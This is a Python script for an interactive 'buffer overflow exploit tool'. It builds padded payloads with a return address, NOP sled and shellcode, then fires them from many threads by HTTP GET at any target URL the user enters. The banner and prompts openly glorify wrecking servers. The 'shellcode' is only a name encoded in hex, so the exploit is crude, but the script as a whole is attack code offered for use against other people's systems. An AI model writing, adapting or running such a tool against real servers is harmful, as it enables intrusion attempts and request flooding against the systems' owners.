Hex Overflow

1. #!/usr/bin/env python3
2. import requests
3. import time
4. import threading
5. import sys
6. class HexOverflow:
7.     class Colors:
8.         RED = "\033[0;31m"
9.         GREEN = "\033[0;32m"
10.         YELLOW = "\033[0;33m"
11.         CYAN = "\033[0;36m"
12.         RESET = "\033[0m"
13.     def __init__(self):
14.         self.url = None
15.         self.param = "user"
16.         self.threads_count = 10
17.         self.requests_per_thread = 10
18.         self.offset = 128
19.         self.ret = "deadbeef"
20.         self.delay = 0.01
21.         self.payload = None
22.     def intro(self):
23.         banner = f"""
24. {self.Colors.RED}##############################################################
25. #                                                          #
26. #               {self.Colors.YELLOW}Welcome to Hex Overflow{self.Colors.RED} - The Ultimate Buffer Overflow Exploit Tool{self.Colors.RED}              #
27. #                                                          #
28. ##############################################################
29. {self.Colors.RESET}
30. {self.Colors.CYAN}Disclaimer: This tool is forged in the darkest corners of cyberspace,
31. built to unleash chaos upon targets with ruthless precision.
32. Use it to devastate vulnerable servers, hijack control flows,
33. and bend systems to your will.
34. Immoral by design, relentless by nature.
35. This is not a game for the faint-hearted.
36. Proceed only if you dare to embrace the void.{self.Colors.RESET}
37. """
38.         print(banner)
39.     def hex_to_payload(self, h):
40.         # Remove 0x and spaces, return bytes
41.         clean = h.replace("0x", "").replace(" ", "")
42.         try:
43.             return bytes.fromhex(clean)
44.         except Exception as e:
45.             print(f"{self.Colors.RED}Invalid hex payload format: {e}{self.Colors.RESET}")
46.             return b""
47.     def craft_payload(self, offset, ret_addr, shellcode_hex, nop_sled=16):
48.         try:
49.             ret_bytes = bytes.fromhex(ret_addr)
50.         except ValueError:
51.             print(f"{self.Colors.RED}Invalid return address hex format. Using default deadbeef.{self.Colors.RESET}")
52.             ret_bytes = bytes.fromhex("deadbeef")
53.         payload = b"A" * offset + ret_bytes + b"\x90" * nop_sled + self.hex_to_payload(shellcode_hex)
54.         return payload
55.     def send_thread(self, url, param, payload, count, tid, delay):
56.         encoded = ''.join(f"%{b:02x}" for b in payload)
57.         for i in range(count):
58.             try:
59.                 r = requests.get(f"{url}?{param}={encoded}", timeout=5)
60.                 print(f"{self.Colors.GREEN}[Thread {tid}] [{i+1:02}] {r.status_code} {r.reason}{self.Colors.RESET}")
61.             except Exception as e:
62.                 print(f"{self.Colors.RED}[Thread {tid}] [{i+1:02}] Failed: {e}{self.Colors.RESET}")
63.             time.sleep(delay)
64.     def get_input(self, prompt, default, cast_func=str):
65.         inp = input(f"{self.Colors.YELLOW}{prompt}{self.Colors.RESET} [{default}]: ").strip()
66.         if inp == "":
67.             return default
68.         try:
69.             return cast_func(inp)
70.         except Exception:
71.             print(f"{self.Colors.RED}Invalid input, using default: {default}{self.Colors.RESET}")
72.             return default
73.     def menu(self):
74.         while True:
75.             print(f"""
76. {self.Colors.CYAN}--- Hex Overflow Control Panel ---
77. 1. Set Target URL (Current: {self.url if self.url else 'Not Set'})
78. 2. Set HTTP Parameter Name (Current: {self.param})
79. 3. Set Number of Threads (Current: {self.threads_count})
80. 4. Set Requests Per Thread (Current: {self.requests_per_thread})
81. 5. Set Buffer Offset (Current: {self.offset})
82. 6. Set Return Address (hex) (Current: {self.ret})
83. 7. Set Delay Between Requests (seconds) (Current: {self.delay})
84. 8. Launch Attack
85. 9. Exit
86. {self.Colors.RESET}
87. """)
88.             choice = input(f"{self.Colors.YELLOW}Select option [1-9]: {self.Colors.RESET}").strip()
89.             if choice == "1":
90.                 url = input("Enter target URL to fuck up: ").strip()
91.                 if url:
92.                     self.url = url
93.                 else:
94.                     print(f"{self.Colors.RED}URL cannot be empty.{self.Colors.RESET}")
95.             elif choice == "2":
96.                 self.param = self.get_input("HTTP parameter name to exploit", self.param, str)
97.             elif choice == "3":
98.                 self.threads_count = self.get_input("Number of concurrent threads", self.threads_count, int)
99.             elif choice == "4":
100.                 self.requests_per_thread = self.get_input("Number of requests per thread", self.requests_per_thread, int)
101.             elif choice == "5":
102.                 self.offset = self.get_input("Buffer offset (number of 'A's)", self.offset, int)
103.             elif choice == "6":
104.                 ret = self.get_input("Return address (hex, e.g. deadbeef)", self.ret, str)
105.                 # Validate hex length
106.                 try:
107.                     bytes.fromhex(ret)
108.                     self.ret = ret
109.                 except Exception:
110.                     print(f"{self.Colors.RED}Invalid hex format for return address, keeping previous value.{self.Colors.RESET}")
111.             elif choice == "7":
112.                 self.delay = self.get_input("Delay between requests (seconds)", self.delay, float)
113.             elif choice == "8":
114.                 if not self.url:
115.                     print(f"{self.Colors.RED}Target URL must be set before launching attack.{self.Colors.RESET}")
116.                     continue
117.                 self.launch_attack()
118.             elif choice == "9":
119.                 print(f"{self.Colors.CYAN}Exiting Hex Overflow. May your exploits be merciless.{self.Colors.RESET}")
120.                 sys.exit(0)
121.             else:
122.                 print(f"{self.Colors.RED}Invalid choice. Enter a number between 1 and 9.{self.Colors.RESET}")
123.     def launch_attack(self):
124.         # Sample shellcode hex (your name as in original)
125.         shellcode_hex = "0x53656261737469616e44616e7465416c6578616e646572"  # "SebastianDanteAlexander" in hex
126.         print(f"\n{self.Colors.CYAN}Crafting payload...{self.Colors.RESET}")
127.         self.payload = self.craft_payload(self.offset, self.ret, shellcode_hex)
128.         print(f"{self.Colors.RED}\nStarting attack with parameters:{self.Colors.RESET}")
129.         print(f"  Target URL: {self.url}")
130.         print(f"  HTTP Param: {self.param}")
131.         print(f"  Threads: {self.threads_count}")
132.         print(f"  Requests/Thread: {self.requests_per_thread}")
133.         print(f"  Buffer Offset: {self.offset}")
134.         print(f"  Return Address: {self.ret}")
135.         print(f"  Delay between requests: {self.delay}s\n")
136.         threads = []
137.         for tid in range(1, self.threads_count + 1):
138.             t = threading.Thread(target=self.send_thread, args=(
139.                 self.url, self.param, self.payload, self.requests_per_thread, tid, self.delay))
140.             t.start()
141.             threads.append(t)
142.         for t in threads:
143.             t.join()
144.         print(f"\n{self.Colors.GREEN}Attack complete. May your exploits wreak havoc.{self.Colors.RESET}")
145. def main():
146.     tool = HexOverflow()
147.     tool.intro()
148.     tool.menu()
149. if __name__ == "__main__":
150.     main()